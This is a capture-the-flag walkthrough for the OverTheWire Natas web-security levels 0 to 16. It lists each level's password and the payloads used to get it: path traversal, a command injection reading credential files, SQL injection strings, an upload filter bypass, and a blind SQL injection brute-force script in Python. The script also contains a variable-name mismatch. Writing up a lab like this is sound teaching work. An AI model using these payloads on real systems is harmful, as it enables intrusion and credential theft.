NATAS Walkthrough

Note: The python script to scrap the password for these challenges was an assignment during my graduate studies. Due to academic policies, it is not available publicly. I am happy to share my work privately - reach out to me via LinkedIn.

Have fun learning web-security :)

Natas answers for levels 1 - 15

Level 0 -> 1

username - natas0 and password - natas0

In level 0, after logging in, right-click on the webpage to view the source code. The password for the next level will be mentioned in a comment in the source code.

Level 1 -> 2

username - natas1 and password - g9D9cREhslqBKtcA2uocGHPfMZVzeFK6

This level is similar to the previous level, only that right-click is now blocked. So instead we use the keyboard shortcut (_usually ctrl+shift+c, but could be different in the browser that you are using)

Level 2 -> 3

username - natas2 and password - h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7

We can view the source code at this level, but there are no comments. We do find another directory referenced in the source code as <img src='files/pixel.png> indicating that there is another directory where files exist. So you add the directory /files to the current URL. You should see a list of files in that directory and notice there is another file named users.txt. You should be able to find the password for the next level when reading this file.

Level 3 -> 4

username - natas3 and password - G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q

In the source code of this webpage, we find a comment that says  This hints us to look at the robots.txt file. So you add /robots.txt to the URL to view that file. This file tells search engines which directories they can or cannot crawl on the website. In this file, we find a directory that has not been allowed for crawling by bots, s3cr3ts. Now we replace the /robots.txt with the new found directory, and find the users.txt file, similar to the previous challenge. Here you will find the password for the next level.

Level 4 -> 5

username - natas4 and password - tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm

This level would require you to understand how to use Burpsuite (or another tool to manipulate headers). After logging into the website using the credentials found in the previous challenge, capture the headers that were sent in the GET request. Now, you will need to change the natas level from natas4(the rest of the value is the same) to natas5(the rest of the value is the same as the original). After changing the URL Referrer, send the GET request with the modified headers. You should be able to view the password for next level on the page content that gets returned to the request made.

Level 5 -> 6

username - natas5 and password - Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD

This level is similar to the previous level. The headers must be captured, and the login status must be changed from False to True.

Level 6 -> 7

username - natas6 and password - fOIvE0MDtPTgRhqmmvvAOt2EfXR6uQgR

This level requires you to do more digging on the website. If you view the source code, there is a hint to the answer in the /includes/secret.inc page that is being referred to match the entered value. When you view that page, it is blank. This will confuse the attacker. However the referred variable in the source code of the main page is from the secrets.inc page, so there must be a variable with the correct value to unlock the password for the next level. If you view the source code of the blank page at /includes/secrets.inc you should find the variable that has the “secret” value that has been commented.

Level 7 -> 8

username - natas7 and password - jmxSiH3SP6Sonf8dv66ng8v1cIEdjXWr

The hint to find the answer that will give us the password is also in the source code. This time, the hint is direct and says that . This means that all we need to do is access this directory on their server to view the password for the next level. If you have used Linux before, then you must be familiar with using the .. to change the working directory to the parent directory. If you haven’t I would suggest you google about it and learn more, if possible try it out to understand better. There is a web vulnerability called Local File Inclusion, that allows a user to access the local files on a server using the ../ to go to the parent directory and then enter the directory that we want to view. When you view the “home” or “about” page, notice the keyword ?page= in the URL. This will query the webserver to view the page mentioned after this keyword. So when we add the string ../../../../../../../etc/natas_webpass/natas8 after the ?page= string in the URL and hit enter, the webpage should show the password for the next level.

Level 8 -> 9

username - natas8 and password - a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB

This time, you see a form field with a submit button. Similar to the previous challenges, we again begin by viewing the source code of the index page. Upon analyzing the source code, we understand that an encrypted key is already written in the source code. The encoded string has been encrypted using the function defined in the source code. decodedstr = base64.b64decode(bytes.fromhex(encodedstr)[::-1]).decode('utf-8')

Level 9 -> 10

username - natas9 and password - Sda6t0vkOPkM8YeOZkAGVhFoaplvlJFd

inject the form field with ; cat /etc/natas_webpass/natas10*

Level 10 -> 11

username - natas10 and password - D44EcsFkLxPIkAAKLosx8z3hxX1Z4MCE

inject the form field without “;”, instead use “.” (use the same injection string as used for the previous challenge)

Level 11 -> 12

username - natas11 and password - 1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg

XOR Cipher -> Encrypted string in the source code which also includes the order of encryption and encoding.

Level 12 -> 13

username - natas12 and password - YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG

upload any file, go to inspect > elements> change the random file name to the format that will unlock the password for the next level (find the required format for filename in the source code).

Level 13 -> 14

username - natas13 and password - lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9

Open the file in a notepad and then add image exif header GIF87a at the beginning and the rest is similar to natas12. You can use any other image exif headers as you just need to validate one of the functions that look for image exif headers on the file uploaded (see it in the source code). Refer to this Wikipedia page for other headers - https://en.wikipedia.org/wiki/List_of_file_signatures

Level 14 -> 15

username - natas14 and password - qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP

SQL injection, use any string for the username (which user would exist by default?) and password string as " or "1"="1

Level 15 -> 16

username - natas15 and password - TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB

Blind SQL injection, its like trial and error method of performing SQL queries to retrieve the desired data (google to learn more).

I used python to perform blind SQL Injection for this challenge, you can use any language you are comfortable with.

import re, requests

url = 'http://natas15.natas.labs.overthewire.org/index.php'
auth = ('natas15','TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB') #auth creds from the previous challenge

passwordlist = []
ch = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" #charset

#the next 2 lines were written to understand the response of the SQL query performed.
#resp = requests.get(url,auth=auth, params = {"username":"natas16\" and password like binary \"%"})
#print(resp.text)

#Then the rest of the code was built after understanding the TRUE and the FALSE response we received. 
for i in range(32): #we know that the hash is 32 bits long, so we will need to guess 32 characters and hence iterate 32 times.
    for j in ch: #iterate through every character from the charset
        resp = requests.get(url,auth=auth, params = {"username":"natas16\" and password like binary \""+"".join(passwdlist)+j+"%"}) #perform a get request
        if "This user exists" in resp.text: #if we get a TRUE response, it means a character matches the original hash. 
            print(f"The character no {i+1} of the password found is : {j}")
            passwordlist.append(j) #append the matching character to the hash
            break

password = "".join(passwordlist)

print(f"\nThe password for Natas Level 16 is : {password}")

Credentials for the next challenge which is level 16 -> 17 are username - natas16 and password - TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V

Natas answers for levels 1 - 15#

Level 0 -> 1#

Level 1 -> 2#

Level 2 -> 3#

Level 3 -> 4#

Level 4 -> 5#

Level 5 -> 6#

Level 6 -> 7#

Level 7 -> 8#

Level 8 -> 9#

Level 9 -> 10#

Level 10 -> 11#

Level 11 -> 12#

Level 12 -> 13#

Level 13 -> 14#

Level 14 -> 15#

Level 15 -> 16#